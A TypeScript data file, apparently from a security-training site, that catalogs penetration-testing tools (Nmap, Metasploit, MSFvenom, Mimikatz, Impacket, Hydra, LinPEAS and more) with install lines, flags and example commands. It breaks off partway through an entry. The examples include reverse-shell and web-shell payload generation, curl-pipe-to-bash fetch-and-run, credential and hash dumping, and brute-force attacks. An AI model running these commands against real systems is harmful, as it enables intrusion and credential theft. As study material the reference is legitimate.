import type { ToolCard } from '@/lib/lab/types'

// ─── Tool Cards ───────────────────────────────────────────────────────────────

export const TOOL_CATEGORIES = ['All', 'Network', 'Web', 'Exploit', 'Password', 'Recon', 'Reverse', 'Forensics', 'OSINT'] as const

export const TOOLS: ToolCard[] = [

  // ── Network ──────────────────────────────────────────────────────────────────

  {
    id: 'nmap',
    name: 'Nmap',
    category: 'Network',
    difficulty: 'beginner',
    version: '7.94',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Industry-standard port scanner for network discovery and security auditing.',
    install: 'sudo apt install nmap',
    flags: [
      { flag: '-sS',           description: 'SYN (stealth) scan' },
      { flag: '-sV',           description: 'Detect service versions' },
      { flag: '-sC',           description: 'Run default scripts' },
      { flag: '-O',            description: 'OS fingerprinting' },
      { flag: '-p-',           description: 'Scan all 65535 ports' },
      { flag: '-A',            description: '-sV -sC -O -traceroute combo' },
      { flag: '-T4',           description: 'Faster scan timing' },
      { flag: '--script vuln', description: 'Vulnerability scripts' },
    ],
    examples: [
      { command: 'nmap -sV -sC -p- 10.10.10.1', description: 'Full port + service + script scan' },
      { command: 'nmap -sn 192.168.1.0/24',      description: 'Subnet host discovery (ping sweep)' },
      { command: 'nmap -sS -T4 --top-ports 1000 target', description: 'Top 1000 ports fast scan' },
      { command: 'nmap --script=http-enum target', description: 'HTTP directory enumeration' },
    ],
    tags: ['port-scan', 'recon', 'network'],
  },
  {
    id: 'wireshark',
    name: 'Wireshark',
    category: 'Network',
    difficulty: 'beginner',
    version: '4.2.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'GUI-based network protocol analyzer with real-time packet capture.',
    install: 'sudo apt install wireshark',
    flags: [
      { flag: 'ip.addr == X.X.X.X',   description: 'IP address filter' },
      { flag: 'tcp.port == 80',        description: 'Port filter' },
      { flag: 'http.request',          description: 'HTTP requests' },
      { flag: 'dns',                   description: 'DNS traffic' },
      { flag: 'tcp.flags.syn == 1',    description: 'SYN packets' },
      { flag: 'frame contains "FLAG"', description: 'Content search' },
    ],
    examples: [
      { command: 'tshark -i eth0 -w capture.pcap', description: 'Save pcap from the CLI' },
      { command: "tshark -r cap.pcap -Y 'http' -T fields -e http.request.uri", description: 'Extract HTTP URLs' },
      { command: "tshark -r cap.pcap -Y 'dns.flags.response == 0'", description: 'Filter DNS queries' },
    ],
    tags: ['packet-analysis', 'network', 'forensics'],
  },
  {
    id: 'netcat',
    name: 'Netcat (nc)',
    category: 'Network',
    difficulty: 'beginner',
    version: '1.219',
    os: ['Linux', 'macOS'],
    description: 'Multi-purpose TCP/UDP networking tool — "the network Swiss Army knife."',
    install: 'sudo apt install netcat-openbsd',
    flags: [
      { flag: '-l', description: 'Listen mode' },
      { flag: '-p', description: 'Specify port' },
      { flag: '-e', description: 'Execute program (legacy nc)' },
      { flag: '-v', description: 'Verbose mode' },
      { flag: '-n', description: 'Skip DNS resolution' },
      { flag: '-u', description: 'UDP mode' },
    ],
    examples: [
      { command: 'nc -lvnp 4444',              description: 'Open a reverse-shell listener' },
      { command: 'nc 10.10.10.1 4444',         description: 'Connect to a target' },
      { command: 'nc -z -v target 20-100',     description: 'Port scan (20-100)' },
      { command: 'cat file | nc -l 1234',      description: 'File transfer (sender)' },
      { command: 'nc target 1234 > file',      description: 'File transfer (receiver)' },
    ],
    tags: ['reverse-shell', 'network', 'pivoting'],
  },
  {
    id: 'aircrack-ng',
    name: 'Aircrack-ng',
    category: 'Network',
    difficulty: 'intermediate',
    version: '1.7',
    os: ['Linux', 'macOS'],
    description: 'Wi-Fi security auditing suite. WEP/WPA/WPA2 cracking and packet injection.',
    install: 'sudo apt install aircrack-ng',
    flags: [
      { flag: 'airmon-ng start wlan0',    description: 'Switch interface to monitor mode' },
      { flag: 'airodump-ng wlan0mon',     description: 'Scan nearby networks' },
      { flag: '-c <channel>',             description: 'Select channel' },
      { flag: '--bssid <mac>',            description: 'Target AP MAC address' },
      { flag: '-w <file>',                description: 'Capture output filename' },
      { flag: 'aireplay-ng -0 10',        description: 'Send deauth attack' },
    ],
    examples: [
      { command: 'sudo airmon-ng start wlan0\nsudo airodump-ng wlan0mon', description: 'Enable monitor mode and list networks' },
      { command: 'sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon', description: 'Capture target AP' },
      { command: 'aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap', description: 'Crack a WPA2 handshake' },
    ],
    tags: ['wireless', 'wifi', 'wpa2', 'cracking'],
  },
  {
    id: 'enum4linux',
    name: 'Enum4linux',
    category: 'Network',
    difficulty: 'beginner',
    version: '0.9.1',
    os: ['Linux'],
    description: 'Windows and Samba enumeration tool for SMB recon and information gathering.',
    install: 'sudo apt install enum4linux\n# or\ngit clone https://github.com/CiscoCXSecurity/enum4linux',
    flags: [
      { flag: '-a',          description: 'Simple full enumeration' },
      { flag: '-U',          description: 'List users' },
      { flag: '-S',          description: 'List shares' },
      { flag: '-P',          description: 'Get password policy' },
      { flag: '-G',          description: 'List groups' },
      { flag: '-o',          description: 'OS information' },
    ],
    examples: [
      { command: 'enum4linux -a 10.10.10.1',  description: 'Full enumeration sweep' },
      { command: 'enum4linux -U 10.10.10.1',  description: 'User listing' },
      { command: 'enum4linux -S 10.10.10.1',  description: 'SMB share listing' },
    ],
    tags: ['smb', 'windows', 'enumeration', 'network'],
  },
  {
    id: 'responder',
    name: 'Responder',
    category: 'Network',
    difficulty: 'intermediate',
    version: '3.1.4.0',
    os: ['Linux'],
    description: 'LLMNR/NBT-NS/MDNS poisoner for capturing NTLMv2 hashes on Windows networks.',
    install: 'git clone https://github.com/lgandx/Responder\ncd Responder && pip3 install -r requirements.txt',
    flags: [
      { flag: '-I <interface>',  description: 'Select network interface' },
      { flag: '-rdw',            description: 'Poison LLMNR, NBT-NS and MDNS' },
      { flag: '-v',              description: 'Verbose mode' },
      { flag: '--lm',            description: 'Request LM hashes' },
      { flag: '-f',              description: 'Fingerprint mode' },
    ],
    examples: [
      { command: 'sudo python3 Responder.py -I eth0 -rdwv',  description: 'Full poisoning mode' },
      { command: 'sudo python3 Responder.py -I eth0 -A',     description: 'Analyze (passive) mode' },
    ],
    tags: ['llmnr', 'ntlm', 'hash-capture', 'windows', 'network'],
  },

  // ── Web ───────────────────────────────────────────────────────────────────────

  {
    id: 'burpsuite',
    name: 'Burp Suite',
    category: 'Web',
    difficulty: 'intermediate',
    version: '2024.3',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Integrated platform for web application security testing — Proxy, Scanner, Intruder.',
    install: 'https://portswigger.net/burp/releases',
    flags: [
      { flag: 'Proxy → Intercept', description: 'Intercept and modify HTTP requests' },
      { flag: 'Repeater',          description: 'Resend and edit individual requests' },
      { flag: 'Intruder',          description: 'Brute force and fuzzing' },
      { flag: 'Scanner',           description: 'Automated vulnerability scanning (Pro)' },
      { flag: 'Decoder',           description: 'Base64, URL encode/decode' },
      { flag: 'Comparer',          description: 'Diff two responses' },
    ],
    examples: [
      { command: 'sqlmap -r request.txt --dbs', description: 'SQLMap from a saved Burp request' },
      { command: 'ffuf -w wordlist -u URL/FUZZ -x http://127.0.0.1:8080', description: 'Fuzz through the Burp proxy' },
    ],
    tags: ['web', 'proxy', 'scanner'],
  },
  {
    id: 'sqlmap',
    name: 'SQLMap',
    category: 'Web',
    difficulty: 'intermediate',
    version: '1.8.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Automated SQL injection detection and exploitation tool.',
    install: 'sudo apt install sqlmap',
    flags: [
      { flag: '-u',         description: 'Target URL' },
      { flag: '-r',         description: 'HTTP request file' },
      { flag: '--dbs',      description: 'List databases' },
      { flag: '-D <db>',    description: 'Select database' },
      { flag: '--tables',   description: 'List tables' },
      { flag: '--dump',     description: 'Dump table contents' },
      { flag: '--batch',    description: 'Auto-confirm all prompts' },
      { flag: '--level=5',  description: 'Test depth (1-5)' },
      { flag: '--os-shell', description: 'Spawn an OS shell' },
    ],
    examples: [
      { command: "sqlmap -u 'http://target/page?id=1' --dbs --batch", description: 'Enumerate databases' },
      { command: "sqlmap -r burp_request.txt -D users --tables --dump", description: 'Dump tables' },
      { command: "sqlmap -u 'URL' --cookie='session=abc' --level=5 --risk=3", description: 'High-depth scan with cookie' },
    ],
    tags: ['sqli', 'web', 'database'],
  },
  {
    id: 'gobuster',
    name: 'Gobuster',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.6.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'HTTP directory and file brute-forcer. Also handles DNS subdomain enumeration.',
    install: 'sudo apt install gobuster',
    flags: [
      { flag: 'dir',  description: 'Directory/file mode' },
      { flag: 'dns',  description: 'Subdomain enumeration mode' },
      { flag: '-u',   description: 'Target URL' },
      { flag: '-w',   description: 'Wordlist file' },
      { flag: '-x',   description: 'File extensions (php,txt,html)' },
      { flag: '-t',   description: 'Thread count (default 10)' },
      { flag: '-s',   description: 'Treat these HTTP codes as success' },
    ],
    examples: [
      { command: 'gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt', description: 'Basic directory scan' },
      { command: 'gobuster dir -u http://target -w wordlist.txt -x php,txt,html -t 50',   description: 'Fast scan with extensions' },
      { command: 'gobuster dns -d target.com -w subdomains.txt',                          description: 'Subdomain enumeration' },
    ],
    tags: ['web', 'directory', 'brute-force'],
  },
  {
    id: 'ffuf',
    name: 'FFUF',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'High-speed web fuzzer for directory, parameter, vhost and content discovery.',
    install: 'sudo apt install ffuf',
    flags: [
      { flag: '-u',  description: 'Target URL (use the FUZZ keyword)' },
      { flag: '-w',  description: 'Wordlist' },
      { flag: '-H',  description: 'Add request header' },
      { flag: '-fs', description: 'Filter by response size' },
      { flag: '-fc', description: 'Filter by HTTP code' },
      { flag: '-mc', description: 'Match only these HTTP codes' },
    ],
    examples: [
      { command: 'ffuf -w wordlist.txt -u http://target/FUZZ',                         description: 'Directory fuzzing' },
      { command: 'ffuf -w params.txt -u "http://target/page?FUZZ=test" -fs 1234',      description: 'Parameter discovery' },
      { command: 'ffuf -w vhosts.txt -u http://target -H "Host: FUZZ.target.com" -fs 0', description: 'Virtual host enumeration' },
    ],
    tags: ['web', 'fuzzing', 'recon'],
  },
  {
    id: 'nikto',
    name: 'Nikto',
    category: 'Web',
    difficulty: 'beginner',
    version: '2.1.6',
    os: ['Linux', 'macOS', 'Windows'],
    description: 'Web server vulnerability scanner — checks 6700+ dangerous files and CGI paths.',
    install: 'sudo apt install nikto',
    flags: [
      { flag: '-h <host>',    description: 'Target server or URL' },
      { flag: '-p <port>',    description: 'Port number (default 80)' },
      { flag: '-ssl',         description: 'Force SSL/HTTPS' },
      { flag: '-o <file>',    description: 'Save output to a file' },
      { flag: '-Format htm',  description: 'HTML formatted report' },
      { flag: '-Tuning x',    description: 'Select test category (0-9,x)' },
    ],
    examples: [
      { command: 'nikto -h http://target.com',                      description: 'Basic web server scan' },
      { command: 'nikto -h https://target.com -ssl -p 443',         description: 'HTTPS scan on port 443' },
      { command: 'nikto -h target.com -o results.html -Format htm', description: 'Generate an HTML report' },
    ],
    tags: ['web', 'scanner', 'vulnerability', 'server'],
  },
  {
    id: 'wpscan',
    name: 'WPScan',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.8.25',
    os: ['Linux', 'macOS'],
    description: 'WordPress security scanner. Surfaces plugin, theme and user vulnerabilities.',
    install: 'gem install wpscan\n# or via Docker:\ndocker run -it --rm wpscanteam/wpscan --url https://target.com',
    flags: [
      { flag: '--url <url>',          description: 'WordPress site URL' },
      { flag: '--enumerate p',        description: 'List plugins' },
      { flag: '--enumerate u',        description: 'List users' },
      { flag: '--enumerate t',        description: 'List themes' },
      { flag: '--passwords <list>',   description: 'Password brute-force' },
      { flag: '--api-token <token>',  description: 'API token unlocks deeper CVE data' },
    ],
    examples: [
      { command: 'wpscan --url https://target.com',                 description: 'Basic WordPress scan' },
      { command: 'wpscan --url https://target.com --enumerate p,u', description: 'Plugin and user enumeration' },
      { command: 'wpscan --url https://target.com --passwords /usr/share/wordlists/rockyou.txt --usernames admin', description: 'Admin password brute-force' },
    ],
    tags: ['web', 'wordpress', 'cms', 'vulnerability'],
  },
  {
    id: 'wfuzz',
    name: 'Wfuzz',
    category: 'Web',
    difficulty: 'intermediate',
    version: '3.1.0',
    os: ['Linux', 'macOS'],
    description: 'Web application fuzzer with strong support for URL, header and POST parameter fuzzing.',
    install: 'pip3 install wfuzz\n# or:\nsudo apt install wfuzz',
    flags: [
      { flag: '-w <wordlist>',     description: 'Wordlist file' },
      { flag: '-u <url>',          description: 'URL containing the FUZZ keyword' },
      { flag: '--hc <code>',       description: 'Hide responses with this HTTP code' },
      { flag: '--sc <code>',       description: 'Show only this code' },
      { flag: '-H "Header: FUZZ"', description: 'Header fuzzing' },
      { flag: '-d "param=FUZZ"',   description: 'POST body fuzzing' },
    ],
    examples: [
      { command: 'wfuzz -w wordlist.txt -u http://target.com/FUZZ --hc 404', description: 'Directory enumeration, hide 404s' },
      { command: "wfuzz -w users.txt -w pass.txt -u http://target/login -d 'user=FUZZ&pass=FUZ2Z' --hc 403", description: 'Dual-payload brute-force' },
    ],
    tags: ['web', 'fuzzing', 'brute-force', 'directory'],
  },
  {
    id: 'nuclei',
    name: 'Nuclei',
    category: 'Web',
    difficulty: 'beginner',
    version: '3.2.9',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Template-based vulnerability scanner. 5000+ ready templates for rapid scanning.',
    install: 'go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest\n# or:\nsudo apt install nuclei',
    flags: [
      { flag: '-u <url>',           description: 'Target URL' },
      { flag: '-t <template>',      description: 'Template file or directory' },
      { flag: '-severity <level>',  description: 'Filter: critical,high,medium,low' },
      { flag: '-l <file>',          description: 'URL list file' },
      { flag: '-o <file>',          description: 'Save results to file' },
      { flag: '-as',                description: 'Automatic scan mode' },
    ],
    examples: [
      { command: 'nuclei -u https://target.com',                              description: 'Scan with all templates' },
      { command: 'nuclei -u https://target.com -severity critical,high',      description: 'Only critical/high findings' },
      { command: 'nuclei -l targets.txt -t cves/ -o results.txt',             description: 'Multi-target CVE scan' },
    ],
    tags: ['web', 'vulnerability', 'scanner', 'template', 'cve'],
  },

  // ── Exploit ───────────────────────────────────────────────────────────────────

  {
    id: 'metasploit',
    name: 'Metasploit',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'The world\'s most widely used penetration testing framework.',
    install: 'sudo apt install metasploit-framework',
    flags: [
      { flag: 'msfconsole',        description: 'Launch the main console' },
      { flag: 'search <keyword>',  description: 'Search exploits/modules' },
      { flag: 'use <module>',      description: 'Select a module' },
      { flag: 'show options',      description: 'Show module options' },
      { flag: 'set RHOSTS <ip>',   description: 'Target IP' },
      { flag: 'set LHOST <ip>',    description: 'Listener IP' },
      { flag: 'run / exploit',     description: 'Launch the attack' },
      { flag: 'sessions',          description: 'List active sessions' },
    ],
    examples: [
      { command: 'msfconsole -q', description: 'Start in quiet mode' },
      { command: 'use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST 10.10.14.1\nrun', description: 'Reverse shell listener' },
      { command: 'search type:exploit platform:linux', description: 'Search Linux exploits' },
    ],
    tags: ['exploit', 'framework', 'post-exploitation'],
  },
  {
    id: 'msfvenom',
    name: 'MSFvenom',
    category: 'Exploit',
    difficulty: 'intermediate',
    version: '6.4.12',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Metasploit payload generation and encoding utility.',
    install: '# Ships with Metasploit\nsudo apt install metasploit-framework',
    flags: [
      { flag: '-p',          description: 'Select payload' },
      { flag: '-f',          description: 'Format (exe, elf, php, raw)' },
      { flag: '-o',          description: 'Output file' },
      { flag: '-e',          description: 'Select encoder' },
      { flag: '-i',          description: 'Encoder iteration count' },
      { flag: 'LHOST LPORT', description: 'Listener IP and port' },
    ],
    examples: [
      { command: 'msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o shell.elf', description: 'Linux reverse shell' },
      { command: 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe -o payload.exe', description: 'Windows Meterpreter' },
      { command: 'msfvenom -p php/reverse_php LHOST=10.10.14.1 LPORT=4444 -f raw -o shell.php', description: 'PHP web shell' },
    ],
    tags: ['payload', 'exploit', 'av-bypass'],
  },
  {
    id: 'impacket',
    name: 'Impacket',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '0.12.0',
    os: ['Linux', 'macOS'],
    description: 'Python library for Windows/AD attacks — Pass-the-Hash, Kerberoasting, NTLM relay.',
    install: 'pip3 install impacket\n# or:\ngit clone https://github.com/fortra/impacket && pip3 install .',
    flags: [
      { flag: 'psexec.py',       description: 'PsExec-style remote command execution' },
      { flag: 'smbclient.py',    description: 'SMB client and share access' },
      { flag: 'secretsdump.py',  description: 'Dump SAM/NTDS.dit hashes' },
      { flag: 'GetUserSPNs.py',  description: 'Kerberoasting — SPN accounts' },
      { flag: 'GetNPUsers.py',   description: 'AS-REP Roasting' },
      { flag: 'ntlmrelayx.py',   description: 'NTLM relay attack' },
    ],
    examples: [
      { command: 'python3 psexec.py domain/user:pass@10.10.10.1', description: 'PsExec via hash or password' },
      { command: 'python3 secretsdump.py domain/admin:pass@DC_IP', description: 'Domain hash dump' },
      { command: 'python3 GetUserSPNs.py domain/user:pass -dc-ip DC_IP -request', description: 'Pull Kerberoasting tickets' },
    ],
    tags: ['windows', 'active-directory', 'pass-the-hash', 'kerberoasting'],
  },
  {
    id: 'mimikatz',
    name: 'Mimikatz',
    category: 'Exploit',
    difficulty: 'advanced',
    version: '2.2.0-20220919',
    os: ['Windows'],
    description: 'Windows credential dumping tool. Extracts password hashes and cleartext from LSASS.',
    install: '# Runs on Windows (AV exclusion or bypass may be required)\n# GitHub: gentilkiwi/mimikatz\n# PowerShell alternative: Invoke-Mimikatz',
    flags: [
      { flag: 'privilege::debug',            description: 'Acquire SeDebug privilege (required)' },
      { flag: 'sekurlsa::logonpasswords',    description: 'All passwords from LSASS' },
      { flag: 'sekurlsa::pth',              description: 'Pass-the-Hash attack' },
      { flag: 'lsadump::sam',               description: 'Dump the SAM database' },
      { flag: 'lsadump::dcsync',            description: 'DCSync — pull NTDS hashes' },
      { flag: 'kerberos::golden',           description: 'Forge a Golden Ticket' },
    ],
    examples: [
      { command: 'privilege::debug\nsekurlsa::logonpasswords', description: 'Dump all cleartext credentials and hashes' },
      { command: 'lsadump::dcsync /domain:domain.local /user:Administrator', description: 'DCSync the Domain Admin hash' },
    ],
    tags: ['windows', 'credential-dumping', 'pass-the-hash', 'active-directory'],
  },

  // ── Password ─────────────────────────────────────────────────────────────────

  {
    id: 'hydra',
    name: 'Hydra',
    category: 'Password',
    difficulty: 'beginner',
    version: '9.5',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Online password brute-force tool with support for 50+ protocols.',
    install: 'sudo apt install hydra',
    flags: [
      { flag: '-l / -L', description: 'Single user / user list' },
      { flag: '-p / -P', description: 'Single password / password list' },
      { flag: '-t',      description: 'Thread count' },
      { flag: '-s',      description: 'Specify port' },
      { flag: '-V',      description: 'Show every attempt' },
      { flag: '-f',      description: 'Stop on first success' },
    ],
    examples: [
      { command: 'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1', description: 'SSH brute-force' },
      { command: 'hydra -L users.txt -P pass.txt ftp://target -t 4', description: 'FTP list-based attack' },
      { command: "hydra -l admin -P rockyou.txt target http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'", description: 'HTTP form brute-force' },
    ],
    tags: ['brute-force', 'password', 'ssh'],
  },
  {
    id: 'hashcat',
    name: 'Hashcat',
    category: 'Password',
    difficulty: 'intermediate',
    version: '6.2.6',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'GPU-accelerated hash cracker — the world\'s fastest password recovery tool.',
    install: 'sudo apt install hashcat',
    flags: [
      { flag: '-m',     description: 'Hash mode (0=MD5, 1000=NTLM, 1800=sha512)' },
      { flag: '-a',     description: 'Attack mode (0=dictionary, 3=brute)' },
      { flag: '-o',     description: 'Output file' },
      { flag: '--show', description: 'Show cracked hashes' },
      { flag: '-r',     description: 'Rule file' },
    ],
    examples: [
      { command: 'hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt', description: 'MD5 dictionary attack' },
      { command: 'hashcat -m 1000 ntlm_hashes.txt wordlist.txt -r rules/best64.rule', description: 'NTLM + rule-based' },
      { command: 'hashcat -m 1800 shadow.hash wordlist.txt --force', description: 'Crack SHA-512 Unix hashes' },
    ],
    tags: ['password', 'hash', 'gpu'],
  },
  {
    id: 'john',
    name: 'John the Ripper',
    category: 'Password',
    difficulty: 'beginner',
    version: '1.9.0-jumbo',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Multi-format hash cracker for /etc/shadow and other offline workloads.',
    install: 'sudo apt install john',
    flags: [
      { flag: '--wordlist',    description: 'Specify wordlist' },
      { flag: '--format',      description: 'Hash format (md5, sha1, bcrypt)' },
      { flag: '--rules',       description: 'Rule-based mutation' },
      { flag: '--show',        description: 'Show cracked passwords' },
      { flag: '--incremental', description: 'Brute-force mode' },
    ],
    examples: [
      { command: 'john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt', description: 'Dictionary attack' },
      { command: 'unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt', description: 'Crack shadow file' },
      { command: 'ssh2john id_rsa > ssh_hash.txt && john ssh_hash.txt --wordlist=rockyou.txt', description: 'Crack SSH key passphrase' },
    ],
    tags: ['password', 'hash', 'offline'],
  },

  // ── Recon ────────────────────────────────────────────────────────────────────

  {
    id: 'linpeas',
    name: 'LinPEAS',
    category: 'Recon',
    difficulty: 'intermediate',
    version: 'latest',
    os: ['Linux'],
    description: 'Automated Linux privilege escalation checker with color-coded output.',
    install: 'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh',
    flags: [
      { flag: '-a', description: 'Run all checks' },
      { flag: '-s', description: 'Quiet mode (critical only)' },
      { flag: '-q', description: 'Fast mode' },
    ],
    examples: [
      { command: 'curl -s http://server/linpeas.sh | bash', description: 'Download and execute in-memory' },
      { command: './linpeas.sh 2>/dev/null | tee linpeas_output.txt', description: 'Persist output to file' },
      { command: "./linpeas.sh -a 2>/dev/null | grep -A5 '99%\\|95%'", description: 'Filter critical findings' },
    ],
    tags: ['privesc', 'linux', 'post-exploitation'],
  },
  {
    id: 'amass',
    name: 'Amass',
    category: 'Recon',
    difficulty: 'intermediate',
    version: '4.2.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Comprehensive subdomain discovery tool — 50+ data sources for attack-surface mapping.',
    install: 'go install -v github.com/owasp-amass/amass/v4/...@master\n# or:\nsudo apt install amass',
    flags: [
      { flag: 'enum -d <domain>',  description: 'Subdomain enumeration' },
      { flag: '-passive',          description: 'Passive sources only' },
      { flag: '-active',           description: 'Include active scanning' },
      { flag: '-o <file>',         description: 'Save results to file' },
      { flag: 'viz -d3',           description: 'D3 visualization' },
    ],
    examples: [
      { command: 'amass enum -d target.com -passive',     description: 'Passive subdomain discovery' },
      { command: 'amass enum -d target.com -active -o subdomains.txt', description: 'Active discovery + save' },
      { command: 'amass intel -whois -d target.com',      description: 'Recon via WHOIS records' },
    ],
    tags: ['subdomain', 'recon', 'attack-surface', 'osint'],
  },
  {
    id: 'sublist3r',
    name: 'Sublist3r',
    category: 'Recon',
    difficulty: 'beginner',
    version: '1.1',
    os: ['Linux', 'macOS'],
    description: 'Subdomain enumerator that pulls from Google, Yahoo, Bing, Baidu and more.',
    install: 'pip3 install sublist3r\n# or:\ngit clone https://github.com/aboul3la/Sublist3r && pip3 install -r requirements.txt',
    flags: [
      { flag: '-d <domain>',  description: 'Target domain' },
      { flag: '-b',           description: 'Brute-force subdomain list' },
      { flag: '-t <threads>', description: 'Thread count' },
      { flag: '-o <file>',    description: 'Output file' },
      { flag: '-e <engines>', description: 'Select engines (google,bing,yahoo)' },
    ],
    examples: [
      { command: 'python3 sublist3r.py -d target.com',            description: 'Basic subdomain scan' },
      { command: 'python3 sublist3r.py -d target.com -b -t 30',   description: 'Brute-forced extended sweep' },
      { command: 'python3 sublist3r.py -d target.com -o subs.txt', description: 'Save to file' },
    ],
    tags: ['subdomain', 'recon', 'osint'],
  },
  {
    id: 'recon-ng',
    name: 'Recon-ng',
    category: 'Recon',
    difficulty: 'intermediate',
    version: '5.1.2',
    os: ['Linux', 'macOS'],
    description: 'OSINT and web reconnaissance framework with a modular professional intel pipeline.',
    install: 'sudo apt install recon-ng\n# or:\ngit clone https://github.com/lanmaster53/recon-ng',
    flags: [
      { flag: 'marketplace search',    description: 'Search modules' },
      { flag: 'marketplace install',   description: 'Install module' },
      { flag: 'modules load',          description: 'Load a module' },
      { flag: 'options set SOURCE',    description: 'Set target domain' },
      { flag: 'run',                   description: 'Execute the module' },
    ],
    examples: [
      { command: 'recon-ng -w target_workspace', description: 'Create a new workspace' },
      { command: "marketplace install recon/domains-hosts/hackertarget\nmodules load recon/domains-hosts/hackertarget\noptions set SOURCE target.com\nrun", description: 'Host discovery via HackerTarget' },
    ],
    tags: ['recon', 'osint', 'framework', 'subdomain'],
  },

  // ── Reverse ──────────────────────────────────────────────────────────────────

  {
    id: 'gdb',
    name: 'GDB + pwndbg',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '14.2 + pwndbg 2024.02',
    os: ['Linux', 'macOS'],
    description: 'GNU Debugger augmented with the pwndbg plugin for binary analysis and exploit dev.',
    install: 'sudo apt install gdb\npip3 install pwndbg\n# or:\ngit clone https://github.com/pwndbg/pwndbg && ./setup.sh',
    flags: [
      { flag: 'r / run',        description: 'Run the program' },
      { flag: 'b *0xaddress',   description: 'Set breakpoint' },
      { flag: 'c / continue',   description: 'Continue execution' },
      { flag: 'ni / si',        description: 'Step over / step into' },
      { flag: 'x/20wx $esp',    description: 'Inspect the stack' },
      { flag: 'info registers', description: 'Register values' },
      { flag: 'disas <func>',   description: 'Disassemble a function' },
      { flag: 'checksec',       description: 'Show binary protections' },
    ],
    examples: [
      { command: 'gdb ./binary\n(gdb) checksec\n(gdb) disas main\n(gdb) b *main+50\n(gdb) run', description: 'Standard analysis flow' },
      { command: "python3 -c \"print('A'*100)\" | gdb ./vuln", description: 'Overflow test' },
    ],
    tags: ['reverse', 'debugger', 'exploit-dev'],
  },
  {
    id: 'ghidra',
    name: 'Ghidra',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '11.1.2',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'NSA-released open-source reverse engineering framework.',
    install: '# Download from https://ghidra-sre.org/\n# Java 17+ required:\nsudo apt install default-jre\nunzip ghidra_*.zip && ./ghidraRun',
    flags: [
      { flag: 'CodeBrowser',     description: 'Assembly and decompiler view' },
      { flag: 'Decompiler',      description: 'Produces C-like pseudocode' },
      { flag: 'Symbol Tree',     description: 'Function and string list' },
      { flag: 'Search → Memory', description: 'Search inside the binary' },
    ],
    examples: [
      { command: './support/analyzeHeadless ./ghidra_proj myProject -import binary.exe -postScript analyze.py', description: 'Headless automated analysis' },
    ],
    tags: ['reverse', 'static-analysis', 'decompiler'],
  },
  {
    id: 'radare2',
    name: 'Radare2',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '5.9.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Open-source binary analysis framework — disassembly, debugging, patching, exploitation.',
    install: 'sudo apt install radare2\n# or:\ngit clone https://github.com/radareorg/radare2 && sys/install.sh',
    flags: [
      { flag: 'aaa',          description: 'Full analysis (all functions)' },
      { flag: 'afl',          description: 'Function list' },
      { flag: 'pdf @main',    description: 'Disassemble main' },
      { flag: 'iz',           description: 'List strings' },
      { flag: 'px 64 @esp',   description: 'Inspect the stack' },
      { flag: 'db 0xaddr',    description: 'Set breakpoint' },
      { flag: 'V',            description: 'Visual mode' },
    ],
    examples: [
      { command: 'r2 -A ./binary\n[0x...]> afl\n[0x...]> pdf @main', description: 'Analysis and main disassembly' },
      { command: 'r2 -d ./binary\n[0x...]> db main\n[0x...]> dc', description: 'Run under the debugger' },
    ],
    tags: ['reverse', 'binary-analysis', 'debugger', 'disassembler'],
  },
  {
    id: 'binwalk',
    name: 'Binwalk',
    category: 'Reverse',
    difficulty: 'intermediate',
    version: '2.4.3',
    os: ['Linux', 'macOS'],
    description: 'Firmware analysis, embedded filesystem extraction and binary inspection.',
    install: 'sudo apt install binwalk',
    flags: [
      { flag: '-e',  description: 'Extract files' },
      { flag: '-E',  description: 'Run entropy analysis' },
      { flag: '-A',  description: 'Scan opcodes' },
      { flag: '-M',  description: 'Recursive scan (matryoshka)' },
    ],
    examples: [
      { command: 'binwalk firmware.bin',   description: 'Scan for file signatures' },
      { command: 'binwalk -e firmware.bin', description: 'Extract embedded content' },
      { command: 'binwalk -E firmware.bin', description: 'Detect encrypted regions' },
    ],
    tags: ['firmware', 'forensics', 'reverse'],
  },

  // ── Forensics ─────────────────────────────────────────────────────────────────

  {
    id: 'volatility',
    name: 'Volatility',
    category: 'Forensics',
    difficulty: 'intermediate',
    version: '3.0.1',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Industry-leading memory (RAM) forensics framework — a CTF forensics staple.',
    install: 'pip3 install volatility3',
    flags: [
      { flag: 'windows.pslist',   description: 'List running processes' },
      { flag: 'windows.netscan',  description: 'Show network connections' },
      { flag: 'windows.dumpfiles', description: 'Extract files' },
      { flag: 'windows.hashdump', description: 'Pull NTLM hashes' },
